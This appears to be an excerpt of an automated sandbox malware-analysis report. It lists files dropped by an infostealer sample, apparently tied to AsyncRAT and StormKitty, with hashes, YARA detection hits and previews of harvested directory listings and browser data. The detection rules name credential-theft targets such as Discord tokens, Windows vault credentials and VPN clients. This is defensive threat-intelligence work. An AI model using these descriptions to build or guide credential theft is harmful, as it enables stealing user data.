                                                                  SSDEEP:3072:oe8p6ewdOIwQx76vK/bvTv0cU+lL/dMlZZUZ0b2gT7wARE+WpCc:86ewwIwQJ6vKX0c5MlYZ0b2c
                                                                  MD5:DA34EA26DDFEDFD7966E8AEDF0BB93E6
                                                                  SHA1:BA30BDE364D564268D175090364158CB66C165A9
                                                                  SHA-256:817940C9DD88C9D185F58532E2027E9DF7BFACA8249EC96AE055DA03C8750F20
                                                                  SHA-512:FBF634FD22EC37A65540C6AD1968B53666308D4D31A151C26B1444E242DE40C95C0F48F96010BC72E5E0E9A10982B4F56590E96ADED12015DE915D7D86AF8DFF
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                  Joe Sandbox View:
                                                                  • Filename: w5APKwp5DD.exe, Detection: malicious, Browse
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                  Category:modified
                                                                  Size (bytes):151803
                                                                  Entropy (8bit):7.9282567999403915
                                                                  Encrypted:false
                                                                  SSDEEP:3072:aBmPRb+aoXqB6LVHSa8jdQqkxQAl6tNOS7b65OMkl/uQaPwiFqH4:aBmPRb+aoXqB6LVHSa8j+qkxQA8tNrvI
                                                                  MD5:45C9C8EB8FDA28C578D6B9B518F6669C
                                                                  SHA1:C57DA4DA4807AF2910F50EEC6224297DAB30CC1E
                                                                  SHA-256:6BA1DDF182A34B7BC18C5E428F6F8475BCA89E0FADA8CA24E274EA416EEE9807
                                                                  SHA-512:A581B91AF19B13EE1DEB033482987D520CA4F9E4E055A8D5D908722ECF72EA1F298ACB39526C98932B9F3D1360614489EEF31FADDEEAF4456CE802F2E7820CE7
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):105
                                                                  Entropy (8bit):3.8863455911790052
                                                                  Encrypted:false
                                                                  SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                                  MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                                  SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                                  SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                                  SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                                  Malicious:false
                                                                  Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Unicode text, UTF-8 text
                                                                  Category:dropped
                                                                  Size (bytes):94
                                                                  Entropy (8bit):4.886397362842801
                                                                  Encrypted:false
                                                                  SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                                  MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                                  SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                                  SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                                  SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                                  Malicious:false
                                                                  Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1393
                                                                  Entropy (8bit):5.241470443395582
                                                                  Encrypted:false
                                                                  SSDEEP:24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
                                                                  MD5:7F24357FFA354F2471DED45552B897D7
                                                                  SHA1:1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
                                                                  SHA-256:573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
                                                                  SHA-512:202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
                                                                  Malicious:false
                                                                  Preview:### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):821
                                                                  Entropy (8bit):5.246999163355071
                                                                  Encrypted:false
                                                                  SSDEEP:24:CZksCekV1LFTNkYQAkfAwO8I+bIPjMMPR0YZI5OLcx0gaaFPRYZX:MeeKj+fTOTPAMP1GNR2X
                                                                  MD5:7D272999F3771275B69C5D01FDE300D3
                                                                  SHA1:5A97E296F4D22652712B13E95AAB3765643982BA
                                                                  SHA-256:84FA0C25B878C62D3FA2AFAC34F6BB459FC9C6CE7A26C19932DC22BBA000E308
                                                                  SHA-512:7DFDB802E44E9A794216C3B345F645811FE3F31B295126697EBF16F6BD8C2AB599A81038C551143C45EFF0B40DBE3CF0386BCF95189903198CFA179E7EB7193E
                                                                  Malicious:false
                                                                  Preview:Desktop\...KATAXZVCPS\....KATAXZVCPS.docx....LTKMYBSEYZ.xlsx....RAYHIWGKDI.png....WKXEWIOTXI.mp3....YPSIACHYXW.pdf....ZBEDCJPBEY.jpg...LTKMYBSEYZ\...NIKHQAIQAU\...NWTVCDUMOB\...ONBQCLYSPU\....DVWHKMNFNN.mp3....HTAGVDFUIE.png....KATAXZVCPS.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.pdf....VLZDGUKUTZ.xlsx...RAYHIWGKDI\...SFPUSAFIOL\...SQRKHNBNYN\...VLZDGUKUTZ\....DVWHKMNFNN.pdf....JSDNGYCOWY.mp3....KATAXZVCPS.xlsx....NWTVCDUMOB.jpg....VLZDGUKUTZ.docx....YPSIACHYXW.png...desktop.ini...DVWHKMNFNN.mp3...DVWHKMNFNN.pdf...Excel.lnk...HTAGVDFUIE.png...JSDNGYCOWY.mp3...KATAXZVCPS.docx...KATAXZVCPS.jpg...KATAXZVCPS.xlsx...LTKMYBSEYZ.xlsx...NWTVCDUMOB.jpg...ONBQCLYSPU.docx...RAYHIWGKDI.png...UMMBDNEQBN.pdf...VLZDGUKUTZ.docx...VLZDGUKUTZ.xlsx...WKXEWIOTXI.mp3...YPSIACHYXW.pdf...YPSIACHYXW.png...ZBEDCJPBEY.jpg...zrrHgsDzgS.exe..
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):834
                                                                  Entropy (8bit):5.282690409163236
                                                                  Encrypted:false
                                                                  SSDEEP:24:qZksCeg1LFTNkY+kfAwj9PjM1YZI5OLcx0gaaFPRYZj:0eeijbfThPAaGNR2j
                                                                  MD5:D2A64505CE2CDB3ACC359558743D90D9
                                                                  SHA1:A1C29490252DBF587AE10FA7BA7D9A7947685664
                                                                  SHA-256:8F321EEE94AA42B17CC49846693023D517E193EAB9F5394A06A91C375CA6E0CC
                                                                  SHA-512:02DDACFA7ACD8FF75150D2778F7DB0319E53B7C76E52B4CEA13C58003817355DD8986E6D4646448B3B0BBA6629E44191DA6BF25EB702FF862B00FF4D9A200C7E
                                                                  Malicious:false
                                                                  Preview:Documents\...BPMLNOBVSB\...FENIVHOIKN\...KATAXZVCPS\....KATAXZVCPS.docx....LTKMYBSEYZ.xlsx....RAYHIWGKDI.png....WKXEWIOTXI.mp3....YPSIACHYXW.pdf....ZBEDCJPBEY.jpg...LTKMYBSEYZ\...My Music\...My Pictures\...My Videos\...NWTVCDUMOB\...ONBQCLYSPU\....DVWHKMNFNN.mp3....HTAGVDFUIE.png....KATAXZVCPS.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.pdf....VLZDGUKUTZ.xlsx...SFPUSAFIOL\...SQRKHNBNYN\...VLZDGUKUTZ\....DVWHKMNFNN.pdf....KATAXZVCPS.xlsx....NWTVCDUMOB.jpg....VLZDGUKUTZ.docx....YPSIACHYXW.png....ZBEDCJPBEY.mp3...desktop.ini...DVWHKMNFNN.mp3...DVWHKMNFNN.pdf...HTAGVDFUIE.png...JSDNGYCOWY.mp3...KATAXZVCPS.docx...KATAXZVCPS.jpg...KATAXZVCPS.xlsx...LTKMYBSEYZ.xlsx...NWTVCDUMOB.jpg...ONBQCLYSPU.docx...RAYHIWGKDI.png...UMMBDNEQBN.pdf...VLZDGUKUTZ.docx...VLZDGUKUTZ.xlsx...WKXEWIOTXI.mp3...YPSIACHYXW.pdf...YPSIACHYXW.png...ZBEDCJPBEY.jpg..
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):338
                                                                  Entropy (8bit):5.287107822500106
                                                                  Encrypted:false
                                                                  SSDEEP:6:3tSLKIyeWrhjWvqj0/m/DvROLXovs0OLPFEKC+PJhr4rmsAnThmyGFNos4hwk4q:QLKPeaiCw/m/zoL4vszLPFEK1h9mmsAf
                                                                  MD5:D9614CBA928B54F7FC5B4C0C735D6B78
                                                                  SHA1:40EEF1EE5AF3AB6E97FD76DD125B936FD92A093C
                                                                  SHA-256:D85AA8C4750E3D5273FA7B69C6989B3A3BD02D392A86B05FAE42D615BCF42AAF
                                                                  SHA-512:2486CF1BB34CD3BF82EBBEE3BC0B12821F9F6F6C3EB35F5C6BE64D1E808CC32D2B025AF2E09DA44EC748B67714B6BF66B34FA2A3BE65F503B673116F3F5C0324
                                                                  Malicious:false
                                                                  Preview:Downloads\...desktop.ini...DVWHKMNFNN.mp3...HTAGVDFUIE.png...HTAGVDFUIE.xlsx...KATAXZVCPS.docx...KATAXZVCPS.jpg...KZWFNRXYKI.png...LTKMYBSEYZ.pdf...LTKMYBSEYZ.xlsx...ONBQCLYSPU.docx...RAYHIWGKDI.png...UMMBDNEQBN.docx...UMMBDNEQBN.pdf...VLZDGUKUTZ.xlsx...WKXEWIOTXI.mp3...WUTJSCBCFX.jpg...YPSIACHYXW.pdf...ZBEDCJPBEY.jpg...ZBEDCJPBEY.mp3..
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.023465189601646
                                                                  Encrypted:false
                                                                  SSDEEP:3:1hiR8LKB:14R8LKB
                                                                  MD5:966247EB3EE749E21597D73C4176BD52
                                                                  SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                                  SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                                  SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                                  Malicious:false
                                                                  Preview:OneDrive\...desktop.ini..
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):88
                                                                  Entropy (8bit):4.450045114302317
                                                                  Encrypted:false
                                                                  SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                                  MD5:D430E8A326E3D75F5E49C40C111646E7
                                                                  SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                                  SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                                  SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                                  Malicious:false
                                                                  Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):24
                                                                  Entropy (8bit):4.053508854797679
                                                                  Encrypted:false
                                                                  SSDEEP:3:jgBLKB:j4LKB
                                                                  MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                                  SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                                  SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                                  SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                                  Malicious:false
                                                                  Preview:Startup\...desktop.ini..
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4580
                                                                  Entropy (8bit):5.289274473813092
                                                                  Encrypted:false
                                                                  SSDEEP:96:4jzcRPTmt6qESfxLJNebQVuLBYwrbIGVy6EdotkTLD8ls6pA2GgcCoXm8LsrOwq:BtbSJLJ4cUtDUKUrpCDq
                                                                  MD5:ED05914E0EABD4F6B2371084616A68D5
                                                                  SHA1:CB0619B619495AD7FE6A530F74A56C466EA5F49A
                                                                  SHA-256:1EFBEA6FD60A1842261AB24F72B5860BC07085F271C38A2346CA4514ED325671
                                                                  SHA-512:F63DBCBF9021383B77AA5A6A8C903F13DC23681F94BE2EDBBA201F00CB43CCEB71DF4D9EBAAE170A973BB4B16BF7C1E1280771EC7702EC7FF6AACDE6445D6662
                                                                  Malicious:false
                                                                  Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.7950885863977324
                                                                  Encrypted:false
                                                                  SSDEEP:3:k+JrLKB:k+JrLKB
                                                                  MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                                  SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                                  SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                                  SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                                  Malicious:false
                                                                  Preview:Videos\...desktop.ini..
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:true
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
